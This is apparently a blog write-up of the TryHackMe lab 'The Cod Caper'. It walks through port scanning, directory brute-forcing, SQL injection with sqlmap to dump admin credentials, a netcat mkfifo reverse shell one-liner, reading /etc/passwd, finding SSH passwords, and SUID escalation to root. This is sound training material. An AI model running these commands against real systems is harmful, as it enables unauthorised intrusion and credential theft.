The Cod Caper — TryHackMe — Write Up

Hello. I’m Rahmos. Here is my The Cod Caper — TryHackMe — Write Up. Check it out!

First, deploy the machine and nmap for opened ports.

nmap -A -T4 -v <ip>

nmap

Now access the website as port 80 (HTTP) is opened. It’s a default Apache website. Use gobuster to scan for hidden dirs.

gobuster dir -u http://<ip> -w /path-to-wordlist

The hint told us to use big.txt, so let’s use that wordlist.

After the scan, we found /administrator.php

It’s a login page. Now use sqlmap (as recommended) to search for sql injection vuln.

sqlmap -u http://<ip>/administrator.php — forms — batch

*specify — batch flag will answer “yes” to all the question sqlmap asks you. You won’t need to press “Y” for every single question!

Then we know that there is a database named users. So let’s run sqlmap again to get all data in users

sqlmap -u http://<ip>/administrator.php — forms — batch -D users — dump

We’ve got the username and password of admin! Now login using the credential above.

login successfully

Seems that we can execute command.

First ls to view files.

ls

So there are 3 files in this directory. (/var/www/html).

On your machine, use nc to start a listener on port 1234:

nc -lvnp 1234

Now execute this cmd to spawn a reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <host-ip> 1234 >/tmp/f

reverse shell

Now you’ve got the shell.

cat /etc/passwd to find the other user.

/etc/passwd

Well he’s papa.

Then use find to search for ssh password

find / -name pass -type f 2>/dev/null

ssh password

Now download the LinEnum.sh script and copy to the ssh machine using scp.

You can download the script here:

rebootuser/LinEnum

Now scp:

scp LinEnum.sh pingu@<ip>:/tmp

scp

Enter the ssh password above and cd /tmp to execute the script

./LinEnum.sh -r report -e /tmp

You will find some interesting SUID files:

SUID files

After that, run the pwndbg as instructed and get root! After that you can read content of the root.txt file.